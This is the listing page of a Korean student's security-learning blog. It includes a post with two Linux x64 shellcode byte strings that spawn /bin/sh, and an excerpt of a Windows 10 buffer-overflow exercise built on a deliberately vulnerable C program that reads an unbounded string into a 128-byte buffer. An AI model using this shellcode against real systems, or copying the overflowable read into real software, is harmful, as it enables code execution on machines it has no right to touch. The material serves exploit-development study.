본문 바로가기

전체 글

Category [University] I am currently taking a course in computer science at the university in the wake of the information age. My major is civil engineering, but I also have great interest in computer science. The category is the one that posts the results of a computer subject that has been acquired in the undergraduate course of a university. I am going to post information that I needed in class or homework that I .. 더보기
Linux/x64 Shellcode (64bit/64비트) Shellcode(23Bytes) "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" Shellcode(31Bytes) "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" 더보기
ASSIGNMENT3 출제 보호되어 있는 글입니다. 더보기
댕댕이 파이썬 2주차 평가 보호되어 있는 글입니다. 더보기
ASSIGNMENT 2 보호되어 있는 글입니다. 더보기
ASSIGNMENT 1 보호되어 있는 글입니다. 더보기
댕댕이 파이썬 1주차 평가 보호되어 있는 글입니다. 더보기
Windows10 BOF 연습 지금까지는 단 한번도 Windows7이상의 환경에서 취약점 분석을 진행해본 적이 없었다. 오랜만에 툴 사용법도 상기시키고 Windows10에서의 pwnable은 어떠한 차이가 있는 지 몸소 느끼기 위해서 취약한 실행파일을 직접 만들어 공격을 진행해보려고 한다. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 #include ; #include ; int main() { char buf[128]; FILE * fp; // getchar(); fp = fopen("data.txt", "r"); fscanf(fp, "%s", buf); printf("Message : %s\n", buf); fclose(fp); return 0; } Colored by Co.. 더보기